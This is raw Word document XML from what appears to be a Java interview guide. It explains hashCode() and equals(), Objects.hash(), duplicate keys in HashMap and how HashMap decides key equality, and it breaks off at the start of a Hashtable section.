    <w:p w14:paraId="38CB375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7617E" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07040AE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4122D127"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Id() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBE967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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F30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B7E8" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FCA2F9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2A90E5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3B3406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BAEE0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AACB5" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FD062A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CodeExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7864DA9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2372F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1 = new Employee(101, "John");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFDE43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2 = new Employee(101, "John");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7928E932" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31870D7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1.hashCode());  // Will print the hashCode value of emp1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251D44A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2.hashCode());  // Will print the hashCode value of emp2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDFCF7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274B1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79A8F8"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F542196"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Code() Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69995C1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the Objects.hash() Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F47B9D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s.hash() method uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Arrays.hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method on the provided fields to compute individual hash codes and then combines them in a way that minimizes collisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB25776"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Happening Internally?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E524F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hashCode() method is called for the Employee object:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B61FCA"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The method takes the values of the object's fields (in this case, id and name).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EE594E"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For each field, it computes the individual hash code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E4E5C4"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int type (id), the hashCode() is the value of the id itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4F87A3"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String type (name), the hashCode() is computed based on the characters in the string using the formula:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1366B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Code(s)=31×hashCode of previous character+current character\text{hashCode}(s) = 31 \times \text{hashCode of previous character} + \text{current character} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36591111"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lue 31 is a prime number that helps in reducing collisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F079B1"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The individual hash codes of the fields are combined using an algorithm (like multiplication with prime numbers and addition) to generate the final hashCode for the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51793DD6"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ormula for Custom hashCode() Calculation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33461FF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typical formula for calculating the hash code of an object with multiple fields:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24455625"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result = 17;  // Arbitrary prime number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1306963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1.hashCode();  // Compute hashCode of first field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBEA95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2.hashCode();  // Compute hashCode of second field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7372EF6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 for other fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5828C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result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202212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our Employee class, it would look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5621CEB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A03997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 hashCode() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2724694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7;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE71E2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id;  // id is an integer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7CD72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name != null ? name.hashCode() : 0);  // name is a String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03578961"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503E124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4FDE9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2B1A6A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The hashCode() method must return the same value every time it is called on the same object, as long as the object’s state doesn’t change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F707923"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The contract between hashCode() and equals() is critical. If two objects are considered equal by the equals() method, they must also return the same hash code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E402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DB65A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n Employee objects is calculated based on the fields of the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D7C12A"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should override the hashCode() method when you want to use custom objects (like Employee) in hash-based collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111A27A6"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Objects.hash() is a simple and effective way to implement hashCode() when you have multiple fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336FD86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hashCode() implementation helps ensure efficient access and storage in hash-based collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E034914" w14:textId="17B8436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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40080190" w14:textId="138C9F61" w:rsidR="00D9071D" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9071D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="177" w:name="_Toc197867391"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Can we have duplicate keys in </w:t>
      </w:r>
      <w:r w:rsidR="00065C10" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="177"/>
    </w:p>
    <w:p w14:paraId="7D69D5DE" w14:textId="1AF6D5F9" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5B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 Java does not allow duplicate keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603E9045"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B319330"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nique Keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In a HashMap, each key must be unique. If you try to insert a key-value pair with a key that already exists in the map, the new value will </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overwrite</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the old value associated with that key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E87666"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CE719C"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20E92A24" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5BE0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0270F5"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74B4449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829A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2E239D01"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AE9F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Engineer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFE377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lice", "Doctor");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A3AE4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Manager");  // This will replace the previous value for "John"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6062650F"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CBED4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John=Manager, Alice=Doctor}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5AAE2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D82DE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664DBC"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Happens Here?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C11C6F"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John" is associated with "Engineer".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626CA0D2"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n, we try to insert "John" again with the value "Manager". This </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the existing value ("Engineer") with "Manager".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C62719A"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HashMap contains {John=Manager, Alice=Doctor}, where the value for "John" has been updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AD0E90"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7514A09F"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A HashMap only allows one value for each key. If you try to insert a duplicate key, the value will be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3362ECB2"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ues Can Be Duplicated</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: While keys must be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in a HashMap can be duplicated. Multiple keys can have the same value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751F491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Mike", "Manager");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C441527"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Sarah", "Manager");  // Both keys have the same value "Manager"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B89C1B" w14:textId="3BAB12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46" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B20B8F" w14:textId="7E9AA6C8" w:rsidR="00D9071D" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9071D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="178" w:name="_Toc197867392"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">How does </w:t>
      </w:r>
      <w:r w:rsidR="00065C10" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">HashMap </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>come to know that two objects are the same or different?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="178"/>
    </w:p>
    <w:p w14:paraId="6E70BDB4" w14:textId="15BFB951" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335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HashMap, the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of keys is determined using two methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762A946E"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method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8D2B7B"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method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CA00B2"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Determines if Two Objects are the Same or Different:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0489A5E7"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keys have the same hash code, they are placed in the same bucket (though not necessarily the same position within the bucket).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA07516"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y have different hash codes, they are placed in different buckets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B8BCDD"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Collision Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If two keys have the same hash code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 xml:space="preserve">), the HashMap needs to check if the keys are actually the same or just have the same hash code. To do this, it us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compare the objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3232250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hashCode() returns the same value for two objects,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is used to check if the two objects are truly equal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C366F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equals() returns true, the keys are considered the same, and the new key-value pair will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the old one in the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B52016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objects are considered different, and a new entry is added to the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640B8C13"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Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you don't override the hashCode() and equals() methods in your custom class, Java will use the default implementations from the Object class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A09AAB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It returns a hash code based on the memory address of the object (which means that different objects will usually have different hash codes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE61075"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It compares the object references (using ==), meaning that two different instances of a class are considered unequal unless they are the exact same instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48122F45"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CAC50F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the HashMap checks for key equality using both hashCode() and equals():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AA16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D2C1F02" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70AE527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A9F592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7E2D168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22C6D4B9" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DB8B5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int id, String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417E0D3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1BCD7A5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4DBAF3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DD35EE" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="436AD5B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74957078"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408A52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AB3AE7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Simple hashCode based on 'id'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A37FB8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B8E879" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40BB248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equals()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667610B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6BE7A3"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8A24A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04FEEB6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42988D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7167267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person.id &amp;&amp; name.equals(person.name);  // Two persons are equal if they have the same id and name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3CD7F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36D68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D00BA6" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="645BB1A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CBB1F0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A2DED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004C6D0D" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F00380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1, "Alice");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1671659E"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1, "Alice");  // Same id and name as p1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17542BC9" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13206B5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5DC279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  // Will replace "Engineer" because p1 and p2 are considered equal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B9E716" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE2E66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Person@hashCode=Doctor}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AE964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C6E6F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98A4FF"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 in This Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FE94BE"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Person class overrides hashCode() to return the id of the person. In this case, both p1 and p2 have the same id, so they will have the same hash code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699D0926"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When p2 is inserted into the map, it has the same hash code as p1 (because they have the same id), and equals() returns true, so the value associated with p1 is replaced by "Doctor".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4799F767"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8B500CF"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where the key-value pair is stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ECEF9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Determines if two keys are the same when they land in the same bucket (hash collision).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B097B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verride Both</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For a custom class used as a key in a HashMap, you should override both hashCode() and equals() methods to ensure proper equality checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D91CC5" w14:textId="68F99EE1" w:rsid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47" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5829A3" w14:textId="64E0CEDD" w:rsidR="000B6684" w:rsidRPr="00CE4B95" w:rsidRDefault="000263C2" w:rsidP="000B6684">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="179" w:name="_Toc197867393"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain HashTable</w:t>
      </w:r>
      <w:r w:rsidR="000B6684" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="179"/>
    </w:p>
    <w:p w14:paraId="1D011B50" w14:textId="12A82F3B" w:rsidR="002F6848" w:rsidRPr="002F6848" w:rsidRDefault="002F6848" w:rsidP="00AD7736">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Hashtable in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8185AF" w14:textId="77777777" w:rsid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 </w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a data structure that stores key-value pairs. It is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package and implements the </w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="002F6848">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A09E0A0" w14:textId="77777777" w:rsidR="00C04FAF" w:rsidRPr="002F6848" w:rsidRDefault="00C04FAF" w:rsidP="002F6848">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
